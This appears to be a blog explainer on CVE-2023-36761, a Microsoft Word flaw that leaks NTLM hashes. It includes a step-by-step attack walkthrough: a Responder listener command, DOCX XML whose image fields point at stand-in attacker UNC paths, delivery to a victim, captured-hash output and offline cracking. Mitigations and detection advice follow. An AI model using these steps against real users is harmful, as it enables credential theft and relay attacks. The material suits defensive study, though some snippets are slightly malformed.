CVE-2023-36761 - How Microsoft Word Leaked Sensitive Info — A Deep Dive

In September 2023, Microsoft patched a serious security flaw in Microsoft Word. Tracked as CVE-2023-36761, this “Information Disclosure Vulnerability” could allow attackers to steal sensitive Windows credentials just by convincing a user to open a crafted document. Let's break down what happened, how it works, and see some direct code snippets.

What is CVE-2023-36761?

CVE-2023-36761 is a security bug in Microsoft Word. Attackers could exploit this vulnerability to force Word to send your NTLM hashes (a type of Windows login credential) to an attacker’s server — without any user interaction except opening a document.

This allowed attackers to launch NTLM relay attacks or try to crack your password offline, leading to wider breaches inside companies.

Patched: September 2023 Patch Tuesday

Official Microsoft advisory:  
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-36761

How Does the Exploit Work?

Microsoft Word supports metadata fields (like “link to another file" or "quick parts"). If an attacker crafts a Word document and inserts a special field that references a network share (UNC path), Word will attempt to connect to that location using the opening user's credentials.

Example of a malicious field in a DOCX document

<w:fldSimple w:instr="INCLUDEPICTURE \\\\attacker.com\\fake\\image.jpg">

When this field loads (even in Preview Pane), Word tries to fetch the picture, automatically sending authentication info!

1. Prepare Your Listener

The attacker sets up a server to capture NTLM hashes. This can be done using Responder or Impacket’s ntlmrelayx.

Responder Example

sudo responder -I eth

2. Create the Malicious Word Document

The attacker needs to add an external image with a UNC path.

Unzip a .docx file, open document.xml, and add

<w:p>
  <w:r>
    <w:pict>
      <v:imagedata r:id="rId999" o:title=""/>
    </w:pict>
  </w:r>
</w:p>

And in document.xml.rels

<Relationship Id="rId999" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"; Target="\\attacker-ip\share\img.jpg"/>

3. Sending the Trap

Send your crafted Word doc via email, message, etc.

4. Capture the Hash

When the victim opens the doc, their Windows client will automatically try to authenticate, and their NTLM hash appears on your attacker box:

[SMB] NTLMv2-SSP Client   : 192.168.1.101
[SMB] NTLMv2-SSP Username : VICTIMPC\jane
[SMB] NTLMv2-SSP Hash     : jane::VICTIMPC:...

Now, the attacker can try to crack it offline with a tool like hashcat.

Why is This So Dangerous?

- No macro, no click, no warning. Just opening/previewing the doc is enough.

How Did Microsoft Fix It?

An update blocks the automatic authentication to remote UNC paths from Word documents.

Update your Office right away!  
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-36761

Indicators of Compromise

If you spot outgoing SMB traffic to unknown IPs/domains (especially when opening documents), your network may be at risk. NTLM relay attacks often show failed logons or connections to unexpected servers.

Never open unsolicited docs: Especially from unknown senders.

- Block outgoing SMB: Use firewalls to block SMB/CIFS (port 445/139) traffic to the internet.

References & Original Sources

- Official Microsoft Advisory
- Huntress Labs: Technical Analysis & Detection
- Proof of Concept (POC) on GitHub
- Impacket Toolkit for Relays
- Detection Guidance

In Summary

CVE-2023-36761 is a classic example of old tricks in new places. By simply sticking a remote image reference into a Word doc, attackers could “fish” for your network credentials. The fix is out — so patch up, and stay sharp when opening unexpected documents.

Timeline

Published on: 09/12/2023 17:15:00 UTC
Last modified on: 09/12/2023 19:38:00 UTC